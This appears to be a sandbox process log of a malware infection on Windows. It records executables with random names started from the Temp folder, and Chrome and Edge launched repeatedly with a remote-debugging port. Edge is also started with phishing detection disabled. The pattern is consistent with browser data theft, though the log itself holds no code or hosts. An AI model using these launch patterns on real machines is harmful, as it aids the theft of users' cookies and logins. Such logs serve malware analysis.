"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2108,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2372 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3156,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3176 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3184,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4496,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4584 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe

"C:\Users\Admin\AppData\Local\Temp\10107830101\Ps7WqSx.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4268,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4228 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4260,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4784 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4972,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4960 /prefetch:8

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1436"

C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe

"C:\Users\Admin\AppData\Local\Temp\10107840101\nhDLtPT.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5424,i,4597352484808868566,7276701717059387884,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5472 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe

"C:\Users\Admin\AppData\Local\Temp\10107850101\cnntXtU.exe"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe11fb46f8,0x7ffe11fb4708,0x7ffe11fb4718

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1436"

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe

"C:\Users\Admin\AppData\Local\Temp\10107860101\e6410dd2f6.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2836 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4400 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4412 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2096 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2456 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5020 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=5024 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2440 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3624 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2092,14887406398537349930,6593105716693109467,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5064 /prefetch:2

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1436"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe11fb46f8,0x7ffe11fb4708,0x7ffe11fb4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,18106494942960664179,16632825225270950601,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:3

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1436"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe292346f8,0x7ffe29234708,0x7ffe29234718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2936 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4680 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2896 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4664 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2420 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3652 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=5072 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,4450348588750423948,9067230612485748789,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3924 /prefetch:2

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe

C:\Windows\system32\tasklist.exe

tasklist /FI "PID eq 1436"

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe292346f8,0x7ffe29234708,0x7ffe29234718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,1897738454572003785,11112025293879290616,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2192 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

